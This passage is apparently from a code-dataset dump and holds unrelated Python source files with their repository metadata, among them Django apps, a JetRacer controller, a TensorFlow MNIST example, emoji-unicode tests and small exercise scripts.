Call C{self._whenRunning} with C{self._whenRunningArguments}.
@note: This method is called after the reactor starts running.
"""
self._whenRunning(**self._whenRunningArguments)
def reactorExited(self):
"""
Call C{self._reactorExited} with C{self._reactorExitedArguments}.
@note: This method is called after the reactor exits.
"""
self._reactorExited(**self._reactorExitedArguments)
| [
"[email protected]"
] | |
d1ac6305dbd6d50b835b3c72c2b048137df5ea1f | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/81/usersdata/212/47049/submittedfiles/dec2bin.py | 6411c5dd71bf68dde30b00d10c31f9fc65086a43 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 138 | py | # -*- coding: utf-8 -*-
p=int(input('digite o valor do menor número:'))
q=int(input('digite o valor do maior número:'))
n=1%10
print(n)
| [
"[email protected]"
] | |
46451d297fa736664316b7c35106ff642cada2ff | cbb7f79a50b05e2ab670ae19bbd1c3b8dead437d | /dict_ordem.py | d24ab507f66b1828b5ff9371ba46aa626fa734e0 | [] | no_license | lfbessegato/Python_Avancado | 3b680d65fe543bd915b5798a85be1f7dadfad4c4 | bb73b99d64f92693a6fe71748f2c24aaabe7d4e1 | refs/heads/master | 2022-09-07T20:28:07.037656 | 2020-05-29T20:24:07 | 2020-05-29T20:24:07 | 265,316,529 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 178 | py | from collections import OrderedDict
# Ordered -> Mantém a Ordem
d = OrderedDict()
d['python'] = 10
d['java'] = 5
d['php'] = 6
d['C'] = 10
for key in d:
print(key, d[key])
| [
"[email protected]"
] | |
c5a55686d52aef4a636fcd08c7d52bca631af994 | 8c3ba133fa34cf2f936ba9176459690008e9e1fb | /imagepy/menus/Window/widgets_plgs.py | 4a05938af587349c3a114d2efe75198b21d28d8b | [
"BSD-2-Clause"
] | permissive | qixinbo/imagepy | fcd272b231b3f49fafd51425f46e826a73841c1f | a2722443dfddf2b0b81b44512427b8a273a7424c | refs/heads/master | 2023-03-16T15:58:57.330418 | 2022-09-03T13:35:46 | 2022-09-03T13:35:46 | 519,933,892 | 0 | 0 | BSD-4-Clause | 2022-08-01T02:02:26 | 2022-08-01T02:02:25 | null | UTF-8 | Python | false | false | 532 | py | from sciapp.action import Free
class Widgets(Free):
"""ImageKiller: derived from sciapp.action.Free"""
title = 'Widgets'
asyn = False
def run(self, para = None):
self.app.switch_widget()
class ToolBar(Free):
title = 'Toolbar'
asyn = False
def run(self, para = None):
self.app.switch_toolbar()
class TableWindow(Free):
"""ImageKiller: derived from sciapp.action.Free"""
title = 'Tables Window'
asyn = False
#process
def run(self, para = None):
self.app.switch_table()
plgs = [Widgets, ToolBar, TableWindow] | [
"[email protected]"
] | |
f6fa771d57a3a10af786708c35aa3393e0e40935 | 9c2ca939f29b861afec382cd17a462775a3974d0 | /run_worker.py | fcec489b5ac3ac725751dac7c59693090a0cba6f | [
"BSD-2-Clause"
] | permissive | merrlyne/gchatautorespond | 1e2009823e16289ea2cea709cfee5cd2a3e97459 | a7f8d7b715ca9851a65588a268ce39addb906b6d | refs/heads/master | 2020-03-20T12:49:18.882038 | 2018-03-29T18:38:58 | 2018-03-29T18:38:58 | 137,441,551 | 0 | 1 | null | 2018-06-15T04:38:49 | 2018-06-15T04:38:49 | null | UTF-8 | Python | false | false | 1,564 | py | from gevent import monkey
monkey.patch_all()
import django
django.setup()
import logging
from threading import Thread
from django.conf import settings
from gevent.wsgi import WSGIServer
from raven.contrib.flask import Sentry
from gchatautorespond.lib.chatworker.worker import Worker, app
from gchatautorespond.lib.chatworker.bot import ContextFilter
if __name__ == '__main__':
worker = Worker()
# Loading takes some time; don't block the api while it goes on.
thread = Thread(target=worker.load)
thread.start()
app.config['worker'] = worker
app.config['LOGGER_NAME'] = 'gchatautorespond.worker'
app.config.update({'SENTRY_' + k.upper(): v for (k, v) in settings.RAVEN_CONFIG.items()
if k != 'dsn'})
# Add the ContextFilter to all stream handlers.
# It can't be attached to the loggers since that wouldn't handle subloggers,
# nor can it be attached to null/sentry handlers, since it'd produce output twice.
handlers = set()
for logger_name in settings.LOGGING['loggers']:
logger = logging.getLogger(logger_name)
for handler in logger.handlers:
if isinstance(handler, logging.StreamHandler):
handlers.add(handler)
for handler in handlers:
handler.addFilter(ContextFilter)
if 'dsn' in settings.RAVEN_CONFIG:
sentry = Sentry(app, dsn=settings.RAVEN_CONFIG['dsn'],
logging=True, level=logging.ERROR)
server = WSGIServer(('127.0.0.1', settings.WORKER_PORT), app)
server.serve_forever()
| [
"[email protected]"
] | |
b2a8e001c69a95a4fb2a947d732d78d6d7d8c012 | 632b94beca62f7c8af5ae1d1e8e095a352600429 | /build/ros_controllers/ros_controllers/position_controllers/catkin_generated/pkg.installspace.context.pc.py | 4ddc4e67bff606fc70fdb62976ffda91a4cd6eb2 | [] | no_license | Haoran-Zhao/US_UR3 | d9eb17a7eceed75bc623be4f4db417a38f5a9f8d | a0c25e1daf613bb45dbd08075e3185cb9cd03657 | refs/heads/master | 2020-08-31T07:02:45.403001 | 2020-05-27T16:58:52 | 2020-05-27T16:58:52 | 218,629,020 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 507 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "${prefix}/include".split(';') if "${prefix}/include" != "" else []
PROJECT_CATKIN_DEPENDS = "controller_interface;forward_command_controller".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "-lposition_controllers".split(';') if "-lposition_controllers" != "" else []
PROJECT_NAME = "position_controllers"
PROJECT_SPACE_DIR = "/home/haoran/US_UR3/install"
PROJECT_VERSION = "0.13.6"
| [
"[email protected]"
] | |
2fea31c0cd40ed40aa5a152c571bd75391e2bf24 | b47f2e3f3298388b1bcab3213bef42682985135e | /experiments/heat-3d/tmp_files/6909.py | efaecf45f0b280f386864f84a69acd803b7e70e3 | [
"BSD-2-Clause"
] | permissive | LoopTilingBenchmark/benchmark | 29cc9f845d323431e3d40e878cbfc6d1aad1f260 | 52a3d2e70216552a498fd91de02a2fa9cb62122c | refs/heads/master | 2020-09-25T09:45:31.299046 | 2019-12-04T23:25:06 | 2019-12-04T23:25:06 | 225,975,074 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 375 | py | from chill import *
source('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/polybench/polybench-code/stencils/heat-3d/kernel.c')
destination('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/experiments/heat-3d/tmp_files/6909.c')
procedure('kernel_heat_3d')
loop(0)
tile(0,2,8,2)
tile(0,4,64,3)
tile(0,6,128,4)
tile(1,2,8,2)
tile(1,4,64,3)
tile(1,6,128,4)
| [
"[email protected]"
] | |
c6061d5f295fed6a46483bf27ca17b45bf838027 | 4c7ea6295a487ec18543e82f66e08a3a2a2fd124 | /apps/logs/action/action_monster_level_reward.py | 8a7e07ee77cf001a6d538be71ca87a390ab9e53c | [] | no_license | robot-nan/GameLogServer | 16217689d88ac5353a61881b03adb1b372cc3e16 | ff2afd6d29e9dce6157a66ff62b4d1ea97d04184 | refs/heads/master | 2021-11-07T21:27:30.494271 | 2015-09-23T15:01:55 | 2015-09-23T15:01:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,292 | py | # -*- coding:utf-8 -*-
"""
宠物等级奖励
"""
from apps.logs.action import action_base
from apps.utils import game_define
def log(user, gold, stone, equip_str, item_str):
"""
输出日志
"""
action = game_define.EVENT_ACTION_GET_MONSTER_LEVEL
cur_gold = user.player.get_gold()
cur_stone = user.player.get_stone()
log_lst = action_base.log_base(user)
log_lst.append(str(action))
log_lst.append(str(gold))
log_lst.append(str(cur_gold))
log_lst.append(str(stone))
log_lst.append(str(cur_stone))
log_lst.append(str(equip_str))
log_lst.append(str(item_str))
log_str = '$$'.join(log_lst)
return log_str
def parse(log_part_lst):
"""
解析
"""
result = dict()
result['action'] = int(log_part_lst[0])
result['add_gold'] = int(log_part_lst[1])
result['cur_gold'] = int(log_part_lst[2])
result['add_stone'] = int(log_part_lst[3])
result['cur_stone'] = int(log_part_lst[4])
result['add_equip_list'] = action_base.get_val(log_part_lst, 5, [], True)
result['add_item_list'] = action_base.get_val(log_part_lst, 6, [], True)
result['old_gold'] = result['cur_gold'] - result['add_gold']
result['old_stone'] = result['cur_stone'] - result['add_stone']
return result | [
"[email protected]"
] | |
3bc24697dee04be43497c122b3028c6926362734 | b213fbd2f4f628aa0f2387c846673ac68e18aa91 | /Binary_Search/600.py | 4e544b47614dc36d42421f95f4fbc7fd3ea4e675 | [
"MIT"
] | permissive | wilbertgeng/LintCode_exercise | 94309b4451e34f1931fce6c2ae90d0c2e7c41d35 | e7a343b746e98ca3b4bc7b36655af7291f3150db | refs/heads/main | 2023-05-13T06:06:50.887791 | 2021-05-26T20:33:51 | 2021-05-26T20:33:51 | 347,850,106 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,701 | py | """600. Smallest Rectangle Enclosing Black Pixels
"""
class Solution:
"""
@param image: a binary matrix with '0' and '1'
@param x: the location of one of the black pixels
@param y: the location of one of the black pixels
@return: an integer
"""
def minArea(self, image, x, y):
# write your code here
if not image or not image[0]:
return 0
m = len(image)
n = len(image[0])
left = self.findFirst(image, 0, y, self.checkColumn)
right = self.findLast(image, y, n - 1, self.checkColumn)
up = self.findFirst(image, 0, x, self.checkRow)
down = self.findLast(image, x, m - 1, self.checkRow)
return (right - left + 1) * (down - up + 1)
def findFirst(self, image, start, end, checkFunc):
while start + 1 < end:
mid = (start + end) // 2
if not checkFunc(image, mid):
start = mid
else:
end = mid
if checkFunc(image, start):
return start
return end
def findLast(self, image, start, end, checkFunc):
while start + 1 < end:
mid = (start + end) // 2
if not checkFunc(image, mid):
end = mid
else:
start = mid
if checkFunc(image, end):
return end
return start
def checkRow(self, image, row):
for i in range(len(image[0])):
if image[row][i] == "1":
return True
return False
def checkColumn(self, image, col):
for i in range(len(image)):
if image[i][col] == "1":
return True
return False
| [
"[email protected]"
] | |
21a3244c094f2c6fdba9b385874dde119094b631 | 525690b220962de7f6253dd1dc557717cffc3441 | /openstack/tests/unit/cloud_eye/test_cloudeye_service.py | 35b73816fe5fdd9edf0eaeabe9ed72d39d48f02c | [
"Apache-2.0"
] | permissive | huaweicloudsdk/sdk-python | bb8dc2bc195d0bdaddf13fef484e3f28aeb2681f | 60d75438d71ffb7998f5dc407ffa890cc98d3171 | refs/heads/master | 2021-06-05T00:04:59.030371 | 2018-09-30T09:40:49 | 2018-09-30T09:40:49 | 110,813,153 | 20 | 18 | NOASSERTION | 2020-07-23T17:01:59 | 2017-11-15T09:31:50 | Python | UTF-8 | Python | false | false | 1,102 | py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import testtools
from openstack.cloud_eye import cloud_eye_service
class TestCloudEyeService(testtools.TestCase):
def test_service(self):
sot = cloud_eye_service.CloudEyeService()
self.assertEqual('cloud-eye', sot.service_type)
self.assertEqual('public', sot.interface)
self.assertIsNone(sot.region)
self.assertIsNone(sot.service_name)
self.assertEqual(1, len(sot.valid_versions))
self.assertEqual('v1', sot.valid_versions[0].module)
self.assertEqual('v1', sot.valid_versions[0].path)
| [
"[email protected]"
] | |
9005aa6da759029734d49699d61f6dfb82e382ee | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/adjectives/_subordinating.py | f414e402006d840f8543ad90d26aa0594767e83c | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 285 | py |
from xai.brain.wordbase.adjectives._subordinate import _SUBORDINATE
#calss header
class _SUBORDINATING(_SUBORDINATE, ):
def __init__(self,):
_SUBORDINATE.__init__(self)
self.name = "SUBORDINATING"
self.specie = 'adjectives'
self.basic = "subordinate"
self.jsondata = {}
| [
"[email protected]"
] | |
e4f116f2d1e3e8c08ce2c7c35289d60e7a2455e5 | 3b2940c38412e5216527e35093396470060cca2f | /top/api/rest/SimbaAdgroupsChangedGetRequest.py | 5b87c69b8afb5cee0f9b6ef7edd9ba1abccebb0d | [] | no_license | akingthink/goods | 842eb09daddc2611868b01ebd6e330e5dd7d50be | ffdb5868a8df5c2935fc6142edcdf4c661c84dca | refs/heads/master | 2021-01-10T14:22:54.061570 | 2016-03-04T09:48:24 | 2016-03-04T09:48:24 | 45,093,302 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 398 | py | '''
Created by auto_sdk on 2015-01-20 12:44:31
'''
from top.api.base import RestApi
class SimbaAdgroupsChangedGetRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
self.nick = None
self.page_no = None
self.page_size = None
self.start_time = None
def getapiname(self):
return 'taobao.simba.adgroups.changed.get'
| [
"[email protected]"
] | |
284b16862546a04753ca39ee352a14563fc28272 | eaf97194e79c31d80f7786b64bbf621581a95dec | /example.py | bba3baa0753070fdc4a03e7eb9cbacab6300db59 | [] | no_license | codesharedot/levolution-price | 333902c32137f9a82bd9d21b26575d646e0f4bb9 | 60c9d52fa42190e4fa929ead32ca611766906005 | refs/heads/master | 2020-08-02T14:26:47.832555 | 2019-09-27T19:27:47 | 2019-09-27T19:27:47 | 211,388,241 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 616 | py | import requests
import json
from forex_python.converter import CurrencyRates
import os
c = CurrencyRates()
rate = c.get_rate('USD', 'EUR')
print(rate)
levolution_api_url = 'https://api.coinmarketcap.com/v1/ticker/levolution/'
response = requests.get(levolution_api_url)
response_json = response.json()
print(response_json)
for coin in response.json():
price = coin.get("price_usd", "U$S Price not provided")
coin_price = float(("{0:.2f}").format(float(price)))
print("$ " + str(coin_price))
coin_price_eur = float(("{0:.2f}").format(float(price)*rate))
print("€ " + str(coin_price_eur))
| [
"[email protected]"
] | |
df3847d46c128ea4255e64467cb577d4e348b21b | 469e3e8de616263bab857df1050d426f40c30d5c | /module3.py | 5d847f0e4e820befd42f51495c91329a0d3b6499 | [
"MIT"
] | permissive | listenzcc/QuickPythonConfig | d487e3c35e906f84503d8992152ee79909d0da30 | ff883c1dd2b7a23a114ec794e3d711fd5d1d15c1 | refs/heads/main | 2023-01-07T20:30:39.060803 | 2020-11-10T08:52:10 | 2020-11-10T08:52:10 | 306,575,328 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 371 | py | # Example of using customized Config object
from Package.defines import Config
config = Config()
config.reload_logger('develop')
config.reload_cfg()
def main():
print('---------------------------------------------------------')
print(config.peek())
config.set('Module 3', 'says', 'It should be a brand new configure')
print(config.peek())
| [
"[email protected]"
] | |
6f45e31cd38fe22467cfb6b9bef6d61c3073ffef | 38c76d29799896a8335bd83b6220acd71d5d8bed | /pyeuler/p053.py | 32ec8ddbb6ba17ace49313419244944a5c2dde50 | [] | no_license | oozk/pyeuler | c010505624bb95043883faa55a776d954c0496dc | 74fd549985722f6d53a1394179d094a106c70689 | refs/heads/master | 2023-04-13T17:50:23.187918 | 2023-04-05T13:00:44 | 2023-04-05T13:00:44 | 261,848,886 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 373 | py | #!/usr/bin/env python3
###
# Problem 53
# https://projecteuler.net/problem=53
###
from math import factorial
def p053(l):
factorials = dict((i, factorial(i)) for i in range(0, l+1))
n_choose_r = lambda n, r: factorials[n] / factorials[r] / factorials[n-r]
return sum(1 for n in range(1, l+1) for r in range(1, n) if n_choose_r(n, r) > 1e6)
print(p053(100))
| [
"[email protected]"
] | |
d8a83a203ad3e39efa214b7786b7be640e6c5c2d | af192ea16aad4264a92039d594d72acca91d0e33 | /tests/tests.py | d329884aa00948981f710044b18f363c5eea0ca8 | [
"MIT"
] | permissive | TakumiHQ/emoji-unicode | ceed81325829e2c44b6d1b04c4dbc7257cc95c86 | 85e8193f05f822641a58eb539b765481b084f83c | refs/heads/master | 2021-01-18T16:08:52.817116 | 2015-11-20T13:10:44 | 2015-11-20T13:10:44 | 66,449,921 | 1 | 0 | null | 2016-08-24T09:17:27 | 2016-08-24T09:17:27 | null | UTF-8 | Python | false | false | 6,812 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import unittest
import logging
import os
import json
import io
from emoji_unicode import replace, normalize, Emoji
from emoji_unicode.utils import code_point_to_unicode, unicode_to_code_point
from emoji_unicode import data_parser
logging.disable(logging.CRITICAL)
DIR = os.path.dirname(__file__)
FIXTURES = os.path.join(DIR, 'fixtures')
EMOJI_PRETTY_JSON = None
def _get_emoji_pretty():
global EMOJI_PRETTY_JSON
if EMOJI_PRETTY_JSON is not None:
return EMOJI_PRETTY_JSON
with io.open(os.path.join(FIXTURES, 'emoji_pretty.json'), encoding='utf-8') as fh:
EMOJI_PRETTY_JSON = fh.read()
return EMOJI_PRETTY_JSON
def get_emoji_pretty():
return json.loads(_get_emoji_pretty())
def code_points_to_unicode(code_points):
return ''.join(
code_point_to_unicode(p)
for p in code_points.split('-')
)
def get_emojis(include_skin_variations=True, include_variations=True):
# todo: include variations (emoji + emo_variation), android doesn't use them, check iOS
emojis = []
for e in get_emoji_pretty():
emojis.append({
'unicode': code_points_to_unicode(e['unified']),
'code_point': e['unified'],
'short_name': e['short_name']
})
if include_skin_variations:
emojis.extend(
{
'unicode': code_points_to_unicode(point),
'code_point': point,
'short_name': e['short_name']
}
for point in e.get('skin_variations', {}).keys()
)
if include_variations:
emojis.extend(
{
'unicode': code_points_to_unicode(point),
'code_point': point,
'short_name': e['short_name']
}
for point in e.get('variations', [])
)
return emojis
def get_emojis_unicode(**kw):
return [e['unicode'] for e in get_emojis(**kw)]
class MetaTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_code_points_to_unicode(self):
self.assertEqual(
code_points_to_unicode('1F58B-1F58B-1F58B'),
'\U0001f58b\U0001f58b\U0001f58b'
)
def test_get_emojis(self):
self.assertEqual(len(get_emojis()), 1736)
self.assertEqual(len(get_emojis(include_skin_variations=False)), 1416)
self.assertEqual(len(get_emojis(include_variations=False)), 1619)
def test_get_emojis_unicode(self):
self.assertEqual(len(get_emojis_unicode()), 1736)
self.assertEqual(len(get_emojis_unicode(include_skin_variations=False)), 1416)
self.assertEqual(len(get_emojis(include_variations=False)), 1619)
class UtilsTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_code_point_to_unicode(self):
self.assertEqual(
code_point_to_unicode('1F58B'),
'\U0001f58b'
)
def test_unicode_to_code_point(self):
self.assertEqual(
unicode_to_code_point('\U0001f58b'),
'1F58B'.lower()
)
class ModelEmojiTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_unicode(self):
emoji = Emoji(unicode='foo')
self.assertEqual(emoji.unicode, 'foo')
def test_code_points(self):
emoji = Emoji(unicode='\U0001f58b\U0001f58b\U0001f58b\uFE0F\u200D')
self.assertEqual(emoji.code_points, '1F58B-1F58B-1F58B'.lower())
def test_as_map(self):
emoji = Emoji(unicode='\U0001f58b\U0001f58b\U0001f58b\uFE0F\u200D')
self.assertEqual(
emoji.as_map(),
[('\U0001f58b', '1f58b'), ('\U0001f58b', '1f58b'), ('\U0001f58b', '1f58b')]
)
class ParserTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_replace(self):
"""
It should replace all emojis
"""
emojis = get_emojis()
# With no spaces will fail due to fitzpatrick tone being a modifier and also a emoji
txt = ' '.join(get_emojis_unicode())
txt_code_points = ' '.join(normalize(e['code_point']) for e in emojis)
res = replace(txt, lambda emoji: emoji.code_points)
self.assertEqual(res, txt_code_points)
def test_replace_with_no_fitz(self):
"""
It should replace no-spaced emojis, excluding fitzpatrick tone emojis
"""
emojis = get_emojis()
txt = ''.join(
e['unicode']
for e in emojis
if 'skin-tone' not in e['short_name']
)
txt_code_points = ''.join(
normalize(e['code_point'])
for e in emojis
if 'skin-tone' not in e['short_name']
)
res = replace(txt, lambda emoji: emoji.code_points)
self.assertEqual(res, txt_code_points)
def test_replace_remove(self):
txt = ''.join(get_emojis_unicode())
res = replace(txt, lambda emoji: '')
self.assertEqual(res, '')
def test_replace_digits(self):
"""
It should not match single digits
"""
txt = '#*0123456789'
res = replace(txt, lambda emoji: '')
self.assertEqual(res, txt)
def test_replace_text_variations(self):
"""
It should not match emojis with text variation
"""
txt = '\u203C\uFE0E'
res = replace(txt, lambda emoji: '')
self.assertEqual(res, txt)
def test_normalize(self):
self.assertEqual(normalize('00A900'), 'a900')
def test_normalize_variations(self):
self.assertEqual(normalize('00A9-FE0F-200D-F00'), 'a9-f00')
def test_normalize_separator(self):
self.assertEqual(normalize('00A9_FE0F_200D_F00', separator='_'), 'a9_f00')
class DataParserTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_parse(self):
res = set(data_parser.parse())
self.assertTrue('\u00A9' in res)
self.assertTrue('\u2194-\u2199' in res) # range
def test_read_template(self):
template = data_parser.read_template()
self.assertTrue('{{code_points}}' in template)
self.assertTrue('RE_PATTERN_TEMPLATE' in template)
def test_render_template(self):
code_points = data_parser.parse()
template = data_parser.read_template()
rendered_template = data_parser.render_template(template, code_points)
self.assertTrue('{{code_points}}' not in rendered_template)
self.assertTrue('RE_PATTERN_TEMPLATE' in rendered_template)
| [
"[email protected]"
] | |
81692c3527f89a21d770bcf0dfe69059814ffe59 | 64f5c0f229e1b1186f12d75b4ba21c07adfcf152 | /index/models.py | fc2791e3989c627bacd03d10534b92d43824f717 | [] | no_license | Emehinola/intouch | 22dd3a81c935956914362604b8fd60d6d7cd2a46 | d370a48c21b93aed797c32a0621c3fa8bda89857 | refs/heads/master | 2023-01-24T22:37:41.862324 | 2020-12-13T08:54:55 | 2020-12-13T08:54:55 | 318,006,792 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 397 | py | from django.db import models
# Create your models here.
# home page view, i.e the surveys views
class HomeViewCount(models.Model):
views = models.IntegerField(default=0) # number of views or visits
time = models.DateTimeField(auto_now_add=True)
class Meta:
ordering = ['-time']
verbose_name_plural = 'Views'
def __str__(self):
return f'{self.views}'
| [
"[email protected]"
] | |
e0a422afafd0c518668c019f26bccbc9e6a9bb01 | 6572f29c4472f1bd131dfb0fba441cb5b641ec83 | /django/mysite_personal_models/blog/urls.py | 6bdac35817b4968ca9cf7207271375c46c4feef1 | [] | no_license | kan-abhulimen/jango-training | 1ccbe04c9f2f481d4482e9fdfd50b1a5b43cc7ae | 734087392cd9635f00596a7955882f4849883930 | refs/heads/master | 2020-03-07T18:37:44.332426 | 2018-01-27T16:11:29 | 2018-01-27T16:11:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 545 | py | from django.conf.urls import url, include
from django.views.generic import ListView, DetailView
from blog.models import Post
urlpatterns = [
url(r'^$', ListView.as_view(
queryset=Post.objects.all().order_by("-date")[:25],
template_name="blog/blog.html")),
url(r'^(?P<pk>\d+)$', DetailView.as_view(
model = Post,
template_name="blog/post.html")),
]
| [
"[email protected]"
] | |
c442740a0bcbc288556a64daa57037c8a3f469ab | d0326c87cda35a4c80d1bb137894a33ca3f1bcc9 | /jetracer/nvidia_racecar.py | ec1631454f4df2f3fb9181022e6a30c9bf3caab6 | [
"MIT"
] | permissive | tokk-nv/jetracer | 5a36fcf809348b609331d369d71cca20010c954a | e83f11522f75d5f89486442ce2e36624e20970a7 | refs/heads/master | 2023-07-03T21:58:25.670731 | 2021-08-09T23:33:58 | 2021-08-09T23:33:58 | 321,274,145 | 1 | 0 | MIT | 2021-06-01T20:47:28 | 2020-12-14T07:59:07 | Jupyter Notebook | UTF-8 | Python | false | false | 1,115 | py | from .racecar import Racecar
import traitlets
from adafruit_servokit import ServoKit
class NvidiaRacecar(Racecar):
i2c_address = traitlets.Integer(default_value=0x40)
steering_gain = traitlets.Float(default_value=-0.65)
steering_offset = traitlets.Float(default_value=0)
steering_channel = traitlets.Integer(default_value=0)
throttle_gain = traitlets.Float(default_value=0.8)
throttle_channel = traitlets.Integer(default_value=1)
def __init__(self, *args, **kwargs):
super(NvidiaRacecar, self).__init__(*args, **kwargs)
self.kit = ServoKit(channels=16, address=self.i2c_address)
self.steering_motor = self.kit.continuous_servo[self.steering_channel]
self.throttle_motor = self.kit.continuous_servo[self.throttle_channel]
@traitlets.observe('steering')
def _on_steering(self, change):
self.steering_motor.throttle = change['new'] * self.steering_gain + self.steering_offset
@traitlets.observe('throttle')
def _on_throttle(self, change):
self.throttle_motor.throttle = change['new'] * self.throttle_gain | [
"[email protected]"
] | |
e6334f2a64f9a1b31d53af7cad6ac3abe5758f7d | 8cce0b5a4be09783016906a36192c52e9daa84aa | /cv_workshops/13-section/7-clazz.py | 4640afbe5beea856e54129e53ebbe39d9916db00 | [
"MIT"
] | permissive | Castrol68/opencv-practice | fcc9495553d3a10fb045c396697391a5d2a06f36 | 83d76132d004ebbc96d99d34a0fd3fc37a044f9f | refs/heads/master | 2023-08-31T07:18:51.497902 | 2020-05-03T17:43:12 | 2020-05-03T17:43:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,057 | py | #!/usr/bin/env python3
# -*- coding=utf-8 -*-
import tensorflow as tf
"""
TensorFlow - hello world
使用安装的TensorFlow 2.0并导入
"""
def main():
# 导入数据集, 数据集下载地址为: http://yann.lecun.com/exdb/mnist/
mnist = tf.keras.datasets.mnist
(x_train, y_train), (x_test, y_test) = mnist.load_data()
# 将整数数据集转换为浮点数
x_train, x_test = x_train / 255.0, x_test / 255.0
# 搭建Sequential模型,并将数据堆叠起来
model = tf.keras.models.Sequential([
tf.keras.layers.Flatten(input_shape=(28, 28)),
tf.keras.layers.Dense(128, activation='relu'),
tf.keras.layers.Dropout(0.2),
tf.keras.layers.Dense(10, activation='softmax')
])
model.compile(optimizer='adam',
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
# 训练
model.fit(x_train, y_train, epochs=5)
# 验证
model.evaluate(x_test, y_test)
if "__main__" == __name__:
main()
| [
"[email protected]"
] | |
6ec621dff6324b2822383c42b374ac54637d859a | dc72e1eb44cfaed330d9477d0c27bee307a81e4a | /Jackpointnew/hand/scripts.py | 47913e46358e99f954ce1218749325896b5b7a09 | [] | no_license | bussiere/JackPointFInal | ba200d85606e17b423535af20a58c04bf5afa550 | c414480fee519e68aece68068e941278fe10cf0a | refs/heads/master | 2021-07-24T14:25:56.982106 | 2013-07-08T11:10:41 | 2013-07-08T11:10:41 | 5,333,141 | 0 | 0 | null | 2021-06-10T17:45:33 | 2012-08-07T20:29:46 | Python | UTF-8 | Python | false | false | 3,808 | py | from django.contrib.auth.models import User
from django.contrib.auth import authenticate
from django.contrib.auth.decorators import login_required
from django.contrib import auth
from skill.models import Skill
from carac.models import Carac
from item.models import Item
from carac.forms import CaracFormChoice
from skill.forms import SkillForm
from item.forms import ItemForm
from jack.forms import JackRegisterForm
from django.forms.formsets import formset_factory
from django.forms.formsets import BaseFormSet
from hand.forms import AskForm
from hand.models import Question,Answer
from jack.models import CaracUser,SkillUser,ItemUser
from tag.models import Tag
from engine.models import ThreadEngine
from engine.script import sendnotification
#TODO
# A factyoriser enregistrement skills carac items
def enregistrementAnswer(request):
user = User.objects.get(id=request.user.id)
reponse = request.POST['Reponse']
tags = request.POST['Tags']
threadengineid = int(request.POST['ThreadEngineId'])
threadengine = ThreadEngine.objects.get(id=threadengineid)
questionid = int(request.POST['QuestionId'])
tags = tags.split("#")
question = Question.objects.get(id=questionid)
answer = Answer.objects.create(user=user,Text=reponse)
answer.Question.add(question)
#TODO
# a factoriser
for tag in tags :
tag = tag.strip()
try :
result = Tag.objects.get(Name=tag)
except :
result = Tag.objects.create(Name=tag)
result.save()
answer.Tags.add(result)
answer.save()
threadengine.Answer.add(answer)
threadengine.save()
def enregistrementAsk(request,caracs,skills,items,intitule,description,tags) :
question = Question.objects.create()
question.save()
question.user = User.objects.get(id=request.user.id)
question.Text = description
question.Intitule = intitule
question.save()
#TODO
#Factoriser et expliquer les tags
tags = tags.split('#')
# TODO
# A factoriser
for tag in tags :
tag = tag.strip()
try :
result = Tag.objects.get(Name=tag)
except :
result = Tag.objects.create(Name=tag)
result.save()
question.Tags.add(result)
question.save()
for carac in caracs.keys():
caracdb = Carac.objects.get(Nom=carac)
try :
result = CaracUser.objects.get(carac=caracdb,Level=int(caracs[carac][0]))
except :
result = CaracUser.objects.create(Level=0)
result.Carac.add(caracdb)
result.Level = int(caracs[carac][0])
result.save()
question.Caracs.add(result)
for skill in skills.keys():
skilldb = Skill.objects.get(Nom=skill)
print "nomSki"
print skilldb.Nom
private = False
try :
result = SkillUser.objects.get(Skills=skilldb,Level=int(skills[skill][0]))
except :
result = SkillUser.objects.create(Level=0)
result.Skill.add(skilldb)
result.Private = private
result.Level = int(skills[skill][0])
result.save()
question.Skills.add(result)
for item in items.keys():
itemdb = Item.objects.get(Nom=item)
try :
